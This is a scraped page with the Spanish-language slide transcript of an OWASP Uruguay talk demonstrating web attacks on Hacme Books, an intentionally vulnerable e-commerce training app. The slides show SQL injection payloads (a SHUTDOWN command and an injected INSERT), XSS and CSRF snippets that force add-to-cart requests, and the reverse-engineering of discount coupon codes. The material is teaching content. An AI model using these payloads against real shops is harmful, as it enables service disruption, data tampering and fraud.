1 / 27

Ejemplos Prácticos de Hacking a un eCommerce Mateo Martínez , QSA, CISSP OWASP URUGUAY

Ejemplos Prácticos de Hacking a un eCommerce Mateo Martínez , QSA, CISSP OWASP URUGUAY. OWASP Vulnerable Web Applications Directory Project. Get out of Jail!. http:// goo.gl /84NfEv. HackPack v1.0 Hacme Bank - Android v1.0 Hacme Bank v2.0 Hacme Books Hacme Casino v1.0

kovit
Download Presentation

Ejemplos Prácticos de Hacking a un eCommerce Mateo Martínez , QSA, CISSP OWASP URUGUAY

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. EjemplosPrácticos de Hacking a un eCommerce Mateo Martínez, QSA, CISSP OWASP URUGUAY

  2. OWASP Vulnerable Web Applications Directory Project Get out of Jail! http://goo.gl/84NfEv

  3. HackPack v1.0 Hacme Bank - Android v1.0 Hacme Bank v2.0 HacmeBooks Hacme Casino v1.0 Hacme Shipping HacmeTravel

  4. #1 Generación de Errores

  5. “ ’ ”

  6. stack trace

  7. • Tipo de BD – Hypersonic SQL (org.hsqldb) • Servidor de Aplicación – Apache Tomcat • Utiliza Spring framework • Aplicación J2EE application – Java namespaces “ ’ ”

  8. #2 Inyección SQL (a)

  9. Comandoparahacer un halt al servidorde BD en HSQLDB : SHUTDOWN

  10. Comandoparahacer un halt al servidorde BD en HSQLDB : SHUTDOWN

  11. select * from products where title like '%texto_del_usuario%' and like '%otro_texto_del_usuario%'

  12. select * from products where title like '%'; SHUTDOWN; --%' and like '%otro_texto_del_usuario%'

  13. #2 Inyección SQL (b)

  14. my feedback', 735); insert into products (title, description, popularity, price, vendor, category, publisher, isbn, author, imgurl, quantity) values ('Eat my shorts you pointy haired boss','A great book',4,29.95,'Amazon','Technical','Addison Wesley','1234567890123','Disgruntled Employee','http://',1); --

  15. #3 XSS (Cross-Site Scripting)

  16. <script>alert("XSS")</script>

  17. You should buy our latest bestseller instead of this book. <script> location="http://localhost:8989/HacmeBooks/addShoppingCart.html?productId=1470" </script>

  18. #4 CSRF (Cross-Site Request Forgery)

  19. You should really consider purchasing the latest bestseller. <img src=http://localhost:8989/HacmeBooks/addShoppingCart.html?productId=1470 height="1"/>

  20. #5 Crypto

  21. 15 % de Descuento AEODBOBOOF 25% de Descuento BEAAABBOOF BEOABDBOOF

  22. AEODBOBOOF BEAAABBOOF BEOABDBOOF 2511122006 2501242006 BEAAAB2006 BEOABD2006

  23. % MesDíaAño 15 04 20 2006 25 11 12 2006 95 04 20 2014 IE OD BO BOAD Probarestecupón: IEODBOBOAD

  24. #6 Broken Access Control

  25. Hacme Books http://sourceforge.net/projects/foundstone

  26. ¡Muchas gracias! mateo.martinez@owasp.org

More Related